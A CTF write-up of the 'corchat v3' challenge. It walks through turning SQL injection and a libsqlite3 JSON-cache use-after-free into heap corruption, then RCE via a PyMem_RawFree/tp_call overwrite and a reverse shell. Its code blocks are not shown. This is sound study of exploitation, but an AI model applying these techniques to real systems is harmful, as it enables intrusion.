corchat v3
Last updated
Last updated
corchat v3
was one of the (many) brainfuck pwn challenges from this CTF, and was the challenge I focused on during the event (gotta get that $50). Unfortunately I didn't solve it during the event, and someone beat me to it anyways. I did however manage to figure out most of how it worked after the event (with some reference to the author's solution). Anways, let's jump in.
As the name implies, the target is a chatting application, which we're given the following source code for:
The app is fairly simple:
A user can send a message (handled by handle_new_message
), which is stored to a sqlite database using an INSERT
statement.
A user connecting to the server (handled by handle_new_connection
) will receive all the messages currently in the database.
The first vulnerability is fairly easy to spot:
When inserting the message into the database, it's inserted directly into the statement using string formatting, instead of something like prepared statements, without checking the contents of the message or escaping problematic characters. This is a classic SQL injection.
Unfortunately we can't use it for an RCE in this case, and it's not like the flag (or anything useful) is in the database. So what on earth is this useful for?
The app is written in python, so it's not like the app itself can have any memory corruption bugs either, so what gives? Isn't this meant to be a pwn challenge???
Well upon closer inspection of the Dockerfile
, we notice something interesting.
While most of the installs are normal, this one stands out, because it's compiling its own very specific version of libsqlite3
using a commit hash. So, what if there was a vulnerability in this version of libsqlite3
? Well the python library wouldn't be implementing all the logic itself, it would instead reuse existing code, which would come from libraries like libsqlite3
, so a vulnerability here would also be a vulnerability in python's sqlite3
, thus our application. And since we have SQL injection, we can pass arbitary SQL commands, so we'd have a decent amount of control in this hypothetical attack scenario.
Let's first look at this commit:
Having a brief look at the current commit didn't ring any alarm bells. But what if there was a vulnerability that was reported and fixed in a later commit. Well scrolling up to the next commit reveals something very appealing:
A potential UAF you say :eyes:. Commit faef28e6bd654e5061561423cb1ece6ca84f1f1f includes a patch for the issue:
At first glance, one can assume that there's a UAF occuring due to the pParse
object's reference count not being incremented, causing it to be incorrectly freed. But what is this talk about a JSON parser cache spill?
We've also been given some test cases which would supposedly trigger the bug:
Let's try them out in the docker.
And that right there, is the pwn we've been looking for.
So at the moment we know there's a UAF in the json_set
and json_replace
functions, but what are these functions?
json_set
takes a json object and key-value pairs, and assigns each pair to the json object (json[key] = value]
).
json_replace
is similar, but only sets the value if the key exists in the object.
From what I could see, there doesn't seem to be a proper JSON object type in sqlite, rather they take and return strings representing JSON objects, which you can see in the test cases as well. This means they need to parse the JSON string every time it's used.
For this writeup we'll focus on json_set
, but note that you could most likely also do this challenge using json_replace
(or json_insert
).
json_set
is implemented with jsonSetFunc
(bet you didn't see that coming).
We see that a function called jsonParseCached
is used to generate the pParse
object we saw earlier which, based on the name, we can assume would parse the JSON string, but also keeps a cache to speed up parsing, which makes sense as a JSON string would have to be parsed each time one was used. Also the bug description described a cache spill/overflow, so I wonder if this has anything to do with it. Foreshadowing is a literary device in wh-
After parsing the JSON it pretty much does what you'd expect:
Lookup the key to get the value pNode
(if it doesn't exist a null slot is allocated by jsonLookup
).
The value pNode
is replaced by the new value with jsonReplaceNode
.
You may have also noticed the bIsSet ? "set : "insert"
, which is because this function can also implement json_insert
. We don't need to worry about the extra logic that this brings as we don't use it here.
Ths is the type of the object pParse
, which represents a parsing of the JSON string, not a typical JSON object you might be picturing which has a list of key-value pairs or a hash table. Think of it more like an AST (Abstract Syntax Tree).
It stores the JSON string that the parse came from and a list of nodes in aNode
, which can have multiple types:
OBJECT/ARRAY: These refer to {}
/[]
respectively, and store the total number of nodes contained in the object/array, which directly follow this object.
STRING/INT/REAL: These contain pointers into the main JSON string referring to the string/int/real, plus the length.
NULL: Represents a null
.
jsonParseCached
is a bit confusing at first, because there's a lot of logic relating to caching that we don't need to worry about too much (particularly regarding whether the JSON is allowed prior edits), so I'll just cover the essentials.
Since an sqlite object is passed, we need to extract the raw char*
in zJson
and the size in nJson
.
Then it iterates through all the possible entries in the JSON parser cache. sqlite stores these in a singly linked list along with other auxillary data allocations (accessed by sqlite3_get_auxdata). Since they're lumped in with other types of allocations, they're uniquely identified by giving them a set of keys that are only used by JSON parse objects, starting at JSON_CACHE_ID, and containing JSON_CACHE_SZ (4) keys.
If a slot is missing, it's marked using iMinKey
, which is used later as the slot to store a new JsonParse
object.
A slot can also be marked using iMinKey
if it's been in the cache too long. This is implemented using numbers representing the iHold
of an object. The object with the lowest iHold
will be removed, and new objects are marked with the highest iHold
out of the currently cached items.
It's easier to think of it like a FIFO queue: An object is inserted into the cache, and as more objects are inserted, the original one is pushed to the end, where it's eventually dequeued to make room for the next one.
A JSON string is matched to cache entry typically by comparing the JSON strings using memcmp
. There is more logic relating to this, but it's not that important for our purposes here.
Above is how a new JsonParse
object is created if a cached one couldn't be found. While most of this isn't too important, there are some details which are interesting to note:
Line 1959: The reference count is set to 1.
Line 1963: This is a case where jsonParse
failed, and there's a comment that the caller will own the new JsonParse
object. If that's what happens in the case of an error, what happens normally?
Line 1971: Well see that it's actually the cache that owns the object, not the caller. Hmmm...
Line 1972: The object is stored to the cache using sqlite3_set_auxdata, at iMinKey
, with the destructor jsonParseFree. If it's replacing an entry that already exists, then the existing entry is freed using its destructor.
The destructor in question behaves how you might expect:
Decrements the reference count until it's 1, in which case free it.
This idea of the cache owning the object is also elaborated on in a comment above:
And if you remember what the patch was, it was jsonSetFunc
incrementing the reference count themselves, effectively also taking ownership of the object. So clearly something went wrong with this idea, and they seemingly had to backtrack a bit to fix it.
So to summarise:
JsonParse
objects are cached in a queue of size 4.
It will attempt to find a cached entry before making a new one.
If one can not be found, a new one will be made.
This new one is added to the queue, potentially forcing another existing entry out of the queue, causing it to be freed.
All entries belong to the cache and have a reference count of 1, which are unchanged by jsonSetFunc
and jsonReplaceFunc
.
Let's have a closer look at how the value node is replaced in json_set
. Remember that jsonSetFunc
uses jsonLookup
(exact details of how this works aren't important) to find a node for the value corresponding to the key, and if the key doesn't already exist, allocate a NULL node for the value of this new key, and use that.
The way replacing a node works is basically by allocating a SUBST node that references the node to be replaced, but the details of this aren't necessary here. Then there's a switch case depending on the type of the sqlite object, so it can handle each type separately. Let's look at the TEXT case.
There's a lot going on here, but it really comes down to 2 separate cases:
sqlite3_value_subtype(pValue) != JSON_SUBTYPE
sqlite3_value_subtype(pValue) == JSON_SUBTYPE
What does it mean for a pValue
to be have JSON_SUBTYPE
. Well, while there isn't a JSON object type per se, there is a distinction between strings that came from JSON functions like json
, json_set
etc. These are marked as having the subtype JSON_SUBTYPE
by jsonReturnJson
, which is used by most of the JSON related functions.
So for example the string "hello world"
would not be considering a JSON subtype, but json("hello world")
would. And if you remember the test cases once again, they used strings in calls to json
. Why is that important?
Well, if we have a closer look at the JSON_SUBTYPE
case:
There's a call to jsonParseCached
, which would make sense, considering that it expects this to be a JSON string. Harmless, right?
Well let's go back to jsonParseCached
. We know that it either returns a JsonParse
from the cache, or creates a new one ands adds it to the cache. Either way, a JsonParse
from jsonParseCached
will belong to the cache. That would include the original JsonParse
all the way back in jsonSetFunc
.
We also know that jsonParseCached
can push old objects out of the cache, causing them to be freed using jsonParseFree
. This could also include the original JsonParse
from jsonSetFunc
!
This on its own isn't a problem, but considering the fact that the object would only belong to the cache, this is now a problem, because when it's freed by jsonParseFree
, it would see that the reference count is 1, so it believes that nothing else is using it (only the cache is), so it's safe to free it!
But of course, it is in use, in jsonSetFunc
, so this causes a UAF!
Walking this through with the (slightly modified) test case:
All the json
function calls are evaluated. These would just return the strings themselves, but they'd be marked as JSON_SUBTYPE
. (They would be parsed and cached, but this doesn't affect much, except clear the previous cache).
The '{}'
would be parsed and cached by jsonParseCached
, placing it at the back of the queue.
The '$.a'
key is looked up, and the null
value would be replaced by '1'
. Since it has JSON_SUBTYPE
, it's parsed and cached, pushing '{}'
1 slot along.
Repeat for '$.b'
and '$.c'
.
By now, the original '{}'
is at the end of the queue, so when '4'
is parsed and cached, it forces '{}'
to be dequeued and freed, resulting in a UAF.
Right now, we have the DOS like the description mentioned, now for the RCE. But how?
Well first we need to control what happens right after the UAF is created to prevent a crash. So what happens next?
Well after the parsing the value that needs to be added to the object, it needs to then add the nodes corresponding to that value. It does this with jsonParseAddNodeArray
.
Remember at this point, the pParse
object has been freed, which would corrupt some of the first fields of the object, depending on what bin it was freed to. By debugging, we can verify that it (usually) gets freed to tcache.
I debugged it by following these instructions:
Running python
or python app.py
Running gdbserver :9090 --attach $(pidof python3)
in another shell
Running gdb -> target remote 127.0.0.1:9090
in another another shell
Here we see it's been freed specifically to tcachebins[0x60]
, which makes sense since we're on glibc 2.31, plus the size of the JsonParse
structure is 0x50 bytes (+ a few more from storing '{}'
). And from the structure dump, we see that the tcache key (a pointer to tcache_perthread_struct
) overlaps with aNode
, which is a pointer to the list of nodes making up the JsonParse
.
This is interesting, because now we're in jsonParseAddNodeArray
, which is about to copy a new set of nodes to aNode
if there's room, and if there isn't, it will realloc
it.
Theoretically this could allow arbitrary control over tcache_perthread_struct
, but there a few problems currently:
An array of JsonNode
s isn't very good for controlling data, as we don't have much control over these. This means that not only is it bad for arbitrary control, but by clobbering tcache
, it'll likely cause a crash in some malloc
call.
realloc
'ing tcache
to a smaller size also clobbers it, as a new size field will show up in the middle of tcache
.
nNode
and nAlloc
are also overwritten by the fd
, so if there's a pointer overlapping this, these fields will be very large and likely result in a crash.
The 3rd problem can be fixed by using a spray to empty tcachebins[0x60]
beforehand, that way the fd
field will be NULL
.
The 1st and 2nd problem we can solve by realloc
'ing with a size larger than 0x290
(the size of tcache_perthread_struct
). If a realloc
call is passed a larger size than the current size of the chunk, and can't expand forward, it'll resort to just:
malloc
'ing a new, larger chunk.
Copying over the data to the new chunk.
free
'ing the old chunk.
This would allow us to perform a House of Spirit
attack on tcache_perthread_struct
, and if we could allocate on top of that with controlled data, we can get an arbitrary write.
For this we'd need a way of spraying controlled data, and this is where I started to struggle, as I was unable to find such a primitive. It turns out the answer was held by another JSON function.
After the CTF, I saw that ryaagard (the challenge author) revealed how they were able to spray data.
This was rather annoying, because if I just kept looking at src/json.c I probably could've found it, but oh well.
json_extract
takes a JSON string and a key, extracts the value corresponding to the provided key, and returns it. It's implemented by jsonExtractFunc, and the key part that makes this possible is jsonReturn.
Specifically the JSON_STRING
case, and when the string contains escape sequences (signified by jnFlags & JNODE_RAW == 0 && jnFlags & JNODE_ESCAPE != 0
), it will malloc
a chunk that's the same length as the escaped sequence, to ensure that there's no possibility of an overflow, as an escaped character will be longer than the character itself. It then goes on to unescape the sequence, making it very useful for a data spray. Although it should be noted that you can't control every single byte in a "chunk" you allocate, due to how the malloc
'ed size will be larger than the unescaped size.
We can also use this to spray tcachebins[0x60]
to empty it.
To ensure these data sprays are preserved (i.e. not freed), we can use a sequence of SELECT json_extract(...)
statements joined by UNION
. I tried other ways of creating these sprays, such as string concatentation, or store them in a list, but both of these methods failed, likely because the strings would only be needed temporarily, and thus be freed (e.g. in concatenation of 2 strings, neither of them are needed again after the concatenation as they make a new, longer string). It seems that UNION
keeps them around however, perhaps because it only combines the results at the very end.
Let's put all of this together into a POC which overwrites tcache with junk.
We start off by spraying chunks to empty:
tcachebins[0x60]
: This will be used for the UAF'ed chunk, so we need fd
to be NULL
.
tcachebins[0x290]
: Ensure that when we free tcache_perthread_struct
, it gets freed to tcache, which makes it easier to reallocate. We don't need to fully empty it (1 slot would work just fine), but we might as well, just to be sure we'll get a slot (plus nothing's stopping us).
Then we trigger the UAF using a modified version of the test case. The change is that we use a list longer than 0x29 elements, to ensure that its aNode
array is bigger than 0x290 bytes (sizeof(JsonNode)=0x10
), which forces realloc
to free tcache_perthread_struct
.
Finally we reclaim the allocation with a dummy.
We can test this as follows:
Bingo!
Now that we have control over tcache_perthread_struct
, what can we do with that? ASLR is in place, and turning this into a leak wouldn't be possible, so is there anything we can target? Yes there is, because thankfully the python
binary is compiled without PIE
:
So what can we target here?
Well one idea that I had was targetting the GOT, but this doesn't work for a very annoying reason: sqlite3_malloc. This is a wrapper around malloc
that does some locking and memory tracking. Part of that memory tracking is counting how many total bytes have been malloc'ed, and to do this it uses malloc_usable_size
.
So with our allocations we have to be careful: if we use a size that's too big (like an address) we'll get a crash, because part of determining the usable size is finding whether the next chunk's prev_inuse
bit is set, so finding the next chunk based on a large size wanders into no man's land.
So GOT
is a no-go. I also considered possibly targetting a python class method. When a class method is called, it's typically done so with the first argument being the object itself (like a thiscall
). So if we could write a command to the start of the object, then overwrite a class method to system@plt
, we could get RCE. I didn't find a way to do this, especially since most objects are on the heap, which we can't access. And while there some objects we can access in _PyRuntime
, it's still not ideal because we need to use a reverse shell command, which we can't fit inside 8 bytes (at offset +0x08
is the pointer to the class object).
So I conceded and looked at ryaagard's solution, and this is what I understood of it:
The first trick used employed by ryaagard was PyMem_RawFree
.
The PyMem_Raw
set of allocation functions use a context object to store function handlers. It first loads the function into rax
, and if it's some specific function (which is a no-op function):
Then it uses the regular free
. Otherwise, it will jump to it, with the first argument being some object from the same context object. This is very appealing, because if we can smash this context object, then any call to it will execute an arbitrary function (like system@plt
) with a controlled first argument (like a reverse shell). This effectively turns PyMem_RawFree
into a constraintless one_gadget.
So we'll need 2 writes:
Write a reverse shell command into memory.
Smash the PyMem_Raw
context.
Now that we have a one_gadget, we can overwrite any class method, and if it's ever called, we'll get a reverse shell. ryaagard opted to overwrite PyFunction_Type
, which is the object representing the python function type. It stores fields, like function pointers, which handle different functionalities of function
objects. One of these is tp_call
, which handles calling functions . This is an ideal target, because there will be many instances where a python function would be called, and all it takes is one of these calls to happen to give us a reverse shell. However, by default tp_call
isn't actually used, so we can't just overwrite it and call it a day. Let's have a closer look:
Searching for references of tp_call
yields _PyObject_MakeTpCall
:
Which, as you might expect, goes on to call the function:
All seems good, so where is this (and tp_call
in general) used? The 2 main instances I found were:
Both of which are used by PyEval_CallObjectWithKeywords
:
In both of these cases, we can see a common thread: _PyVectorcall_Function
is used to determine whether or not to use tp_call
. It seems like this has to return NULL
for python to decide to use tp_call
, so how do we do that?
It turns out that it checks for feature VECTORCALL
, by checking the tp_flags
field of the class, and seeing whether the _Py_TPFLAGS_HAVE_VECTORCALL (1<<11
) flag is set. If it's disabled (i.e. flag isn't set), then it resorts to tp_call
.
We can determine, by looking at the _typeobject struct definition, that the offsets we need are:
0x80
: tp_call
(= PyMem_RawFree
)
0xa8
: tp_flags
(= 0
)
We also have another problem of triggering tp_call
. This because another snag which is the fact that at the end of executing the SQL statement, like a reasonable application which wants to avoid memory leaks (lame), it frees all the memory it allocated previously, including our arbitrary allocations. When freeing these, the process will abort because they're obviously malformed "chunks", so we never actually reach the python part of the thread we corrupt, meaning our corrupted data isn't used by this thread.
Fortunately, the web application is multithreaded, and share all the same memory, so while the current thread may abort, another thread may want to call a python function, and will use our corrupted tp_call
, before the application can abort. So ideally we'd need to stall our thread from aborting, to give us time for the application to trigger our reverse shell.
While sqlite doesn't have any kind of SLEEP
statement, we can use an SQL statement that would take a while to evaluate, which are also commonplace in SQL time-based injections. So we can use something like the following:
So finally, putting all of this together, we can finally produce the following exploit:
To receive the reverse shell I chose to spin up a digitalocean instance, and setup a netcat listener. Let's fire away!